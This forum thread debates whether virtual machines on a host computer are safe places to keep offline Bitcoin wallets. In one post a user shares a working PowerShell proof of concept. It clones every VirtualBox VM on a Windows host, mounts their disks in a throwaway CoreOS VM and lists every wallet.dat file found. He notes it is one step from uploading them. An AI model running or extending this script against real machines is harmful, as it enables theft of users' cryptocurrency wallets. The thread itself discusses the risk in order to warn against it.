virtual machines as offline wallets

[mistersheep]

Has anyone tried setting up say, an Ubuntu VM under Virtualbox for their offline wallet?
Seems like backup & restore would become greatly simplified...
Thanks.

[Carlton Banks]

It would also simplify the job of your common household bitcoin burglar. VM escape and/or hypervisor exploits are what you could potentially fall victim to. Using VirtualBox as a hypervisor for keeping an offline VM segregrated and secure.... I'm not sure about the wisdom of that.

I use Qubes OS (which is a desktop OS designed around the concept of using VM's to make an OS more secure). Some of the tools the developers of Qubes provide encourages this way of working (something called split-GPG, which is pretty cool). I'm not fully 100% convinced that this is safe, but to give you an idea of how they feel about it: they use that system to protect their signing keys for releases of the OS.

Be interesting to hear a range of views on this, I'm sure plenty of others would like to skip the step where they purchase an offline-only machine.

[unamis76]

Why would a VM be safer than an online machine? You have to run it from an online machine, even if you isolate your VM... I definitely wouldn't feel safe using one for offline storage

[Carlton Banks]

Why would a VM be safer than an online machine? You have to run it from an online machine, even if you isolate your VM... I definitely wouldn't feel safe using one for offline storage

Well, maybe a VM on a physically offline machine is still an improvement on a bare metal OS on a physically offline machine.

If your offline machine has the USB interfaces connected to one VM, and you have PCI passthrough on your machine, you can create a much more restrictive environment for any malware targetting some aspect of the USB hardware (the USB hubs are only made available to a USB VM, malware cannot easily escape the USB VM, and the USB device itself can be virtualised for use in a different VM, storage devices in particular are simple to use this way)

[picobit]

Why would a VM be safer than an online machine? You have to run it from an online machine, even if you isolate your VM... I definitely wouldn't feel safe using one for offline storage

It is a lot safer than an online machine, but significantly less safe than a true offline machine.  I use it myself for a small day-to-day wallet, and have a larger one on an offline machine.  The VM is very convenient.  Of course a determined hacker who is controlling the online machine can run with the funds.  But the random wallet-stealing and password sniffing piece of malware cannot.  It requires a specialised piece of malware written for the specific setup.

[Amph]

Why would a VM be safer than an online machine? You have to run it from an online machine, even if you isolate your VM... I definitely wouldn't feel safe using one for offline storage

you can encrypt it, this is possible with vmware wirtual machine, (workstation 11 is very good), it should be 100% isolated unless they have access to your host via kernel

[Carlton Banks]

Why would a VM be safer than an online machine? You have to run it from an online machine, even if you isolate your VM... I definitely wouldn't feel safe using one for offline storage

you can encrypt it, this is possible with vmware wirtual machine, (workstation 11 is very good), it should be 100% isolated unless they have access to your host via kernel

Bolded text is highly important. If you're running Windows or OSX as the host, "they" may well find it pretty easy to access your supposedly isolated VM.

[btchris]

It is a lot safer than an online machine, but significantly less safe than a true offline machine.  I use it myself for a small day-to-day wallet, and have a larger one on an offline machine.  The VM is very convenient.  Of course a determined hacker who is controlling the online machine can run with the funds.  But the random wallet-stealing and password sniffing piece of malware cannot.  It requires a specialised piece of malware written for the specific setup.

So this kinda rubbed me the wrong way. I mean nothing personal when I say this, but calling a VM "a lot safer" is IMO a really dangerous statement. Even if it's true that today's malware doesn't try to reach inside VMs to extract sensitive info (and I'm not so sure about that), trying to guess about how sophisticated malware is a year or two down the road is awfully difficult.

To prove a point over just how "specialised [a] piece of malware written for the specific setup" needs to be, here's a (PowerShell) script which *almost* grabs all wallet.dat files from any (unencrypted) VirtualBox VMs on a Windows host (whether they are currently running or not). It's got plenty of limitations (it requires that Vagrant and Git for Windows are already installed, it has zero error-checking, etc.), but it's just a proof of concept which hopefully gets the point across.

Code:

# Add VBoxManage and Git for Windows ssh to the path
$env:Path += ';' + (Join-Path $env:ProgramFiles Oracle\VirtualBox)
$env:Path += ';' + (Join-Path ${env:ProgramFiles(x86)} Git\bin)

# Retrieve the UUIDs of all current VirtualBox VMs
$vm_uuids = VBoxManage list vms | Select-String '{(.*)}$' | ForEach-Object {
    $_.Matches[0].Groups[1].Value
}

# Configure Vagrant to prepare a CoreOS VM (relatively small, ~200MB)
mkdir coreos
cd coreos
vagrant init yungsang/coreos

# Modify the CoreOS VM to use a 30-port SATA controller
Add-Content Vagrantfile @"
Vagrant.configure(2) do |config|
    config.vm.provider 'virtualbox' do |vb|
        vb.customize ['storagectl', :id, '--name', 'SATA Controller', '--portcount', 30]
    end
end
"@

# Download and start the CoreOS VM
vagrant up

$coreos_uuid = Get-Content .vagrant\machines\default\virtualbox\id -Head 1
$next_port   = 1  # the next available SATA port

foreach ($uuid in $vm_uuids) {  # for each VM

    # Create a (copy-on-write) clone of the VM (works even if it's currently running)
    VBoxManage snapshot $uuid   take     $uuid-snap --live
    VBoxManage clonevm  $uuid --snapshot $uuid-snap --options link --name $uuid-clone --register

    # Add all of the clone's SATA drives to the CoreOS instance
    VBoxManage showvminfo $uuid-clone | Select-String '^SATA .*\(UUID: ([^)]*)' | ForEach-Object {
        VBoxManage storageattach $coreos_uuid --storagectl 'SATA Controller' --port ($next_port++) --type hdd --medium $_.Matches[0].Groups[1].Value
    }
}
Start-Sleep -Seconds 10  # give CoreOS some time to finish recognizing the new drives

# Try to mount every partition found
vagrant ssh -c 'cd /dev ; for D in sd[b-z]?* ; do mkdir /media/$D ; sudo mount -r $D /media/$D ; done'

# Record all found wallet.dat files
vagrant ssh -c 'sudo find /media -name wallet.dat -ls' > ..\wallet-files.txt

# Remove the CoreOS VM and the Vagrant cached image and config
vagrant destroy -f
vagrant box remove yungsang/coreos -f  # comment this out if you intend to run this multiple times to avoid the download step
rmdir -Force -Recurse .vagrant
rm Vagrantfile
cd ..
rmdir coreos

# Remove the VM clones
foreach ($uuid in $vm_uuids) {
    VBoxManage unregistervm $uuid-clone --delete
    VBoxManage snapshot $uuid delete $uuid-snap
}

Get-Content wallet-files.txt

Write-Host -NoNewline Press any key to exit ...
$host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown') > $null

So in just 66 lines of Windows shell code, it lists out all found wallet.dat files -- just one step away from actually uploading them somewhere. This plus a keylogger on the host, and it's game over.

Now I'm not even a software dev by trade (or at least haven't been one in a while), so I have to assume that proficient malware authors are going to be a lot more sophisticated about this sort of attack.

I don't mean to claim that there's zero advantage to using VMs (more so when their encryption requires an interactive password), but advocating them as a lot safer (or as any kind of alternative to cold storage) sounds really troubling to me.

[Carlton Banks]

Who could've predicted that Windows is a really insecure VM host?  

I don't mean to claim that there's zero advantage to using VMs (more so when their encryption requires an interactive password), but advocating them as a lot safer (or as any kind of alternative to cold storage) sounds really troubling to me.

Both. Using both is safer than either on their own (think BadUSB attacks).

[Rampion]

Who could've predicted that Windows is a really insecure VM host?  

I guess it wouldn't be difficult to create the kind of script btcchris posted for OSX and Linux too.

[Carlton Banks]

Who could've predicted that Windows is a really insecure VM host?  

I guess it wouldn't be difficult to create the kind of script btcchris posted for OSX and Linux too.

Do it for Xen

[btchris]

Who could've predicted that Windows is a really insecure VM host?  

I guess it wouldn't be difficult to create the kind of script btcchris posted for OSX and Linux too.

Do it for Xen

Generally things are easier when using Linux (Host-wise or Guest-wise) thanks to its better coverage of different filesystems and generally easier scripting (PowerShell works great if you're dealing with all Microsoft products (e.g. HyperV), but bash is probably easier in other cases).

Also, just about all modern virtualization technologies are designed to be fairly easily scriptable.

Having said that, I suspect that running a Hypervisor such as Xen (open source) or vSphere (closed source but free for some uses) with no IP interfaces / no remote management, and then running multiple guests under that (e.g. one for bitcoin and one for general use) probably would add a decent amount of security. Hypervisor breaks aren't unheard of, but Hypervisor devs attempt their best to prevent them.

I'd never heard of Qubes before CB mentioned it above, but it looks like this is its approach -- it's definitely something I'll be taking a look at.

[Carlton Banks]

Having said that, I suspect that running a Hypervisor such as Xen (open source) or vSphere (closed source but free for some uses) with no IP interfaces / no remote management, and then running multiple guests under that (e.g. one for bitcoin and one for general use) probably would add a decent amount of security. Hypervisor breaks aren't unheard of, but Hypervisor devs attempt their best to prevent them.

I'd never heard of Qubes before CB mentioned it above, but it looks like this is its approach -- it's definitely something I'll be taking a look at.

Qubes/Xen are not infallible, obviously. There was, for instance, a high severity Xen bug patched recently, and the Qubes team were pretty critical of the approach the Xen team took with respect to the patch (as well as the original design).

Despite this, that was the first serious flaw that could potentially impact Qubes systems for quite some time (there have been various Xen security bugs, but none affected para-virtualised guests, as Qubes uses by default). In that space of time, I think Linux, BSD, OSX, Windows and anything else I'm aware of suffered far more numerous/serious bugs (hardened Linux didn't necessarily protect against Shellshock, but Qubes eschews the root user model entirely)

[Amph]

Who could've predicted that Windows is a really insecure VM host?  

I don't mean to claim that there's zero advantage to using VMs (more so when their encryption requires an interactive password), but advocating them as a lot safer (or as any kind of alternative to cold storage) sounds really troubling to me.

Both. Using both is safer than either on their own (think BadUSB attacks).

which windows? windows 10 will have a new kernel, probably a better security because of this

i still think the best antivirus is the owner of the machine, the OS itself does not matter much

[Carlton Banks]

Who could've predicted that Windows is a really insecure VM host?  

which windows? windows 10 will have a new kernel, probably a better security because of this

Why probably? I can tell you why I think it will "probably" include better security: Microsoft will provide evidence of the new security features by listing a whole bunch of non-words with trailing ^TM symbols. Security you can believe in   (and you have no choice except simply believing them)

i still think the best antivirus is the owner of the machine, the OS itself does not matter much

I don't use any anti-virus product. But that's because of the OS, not in spite of it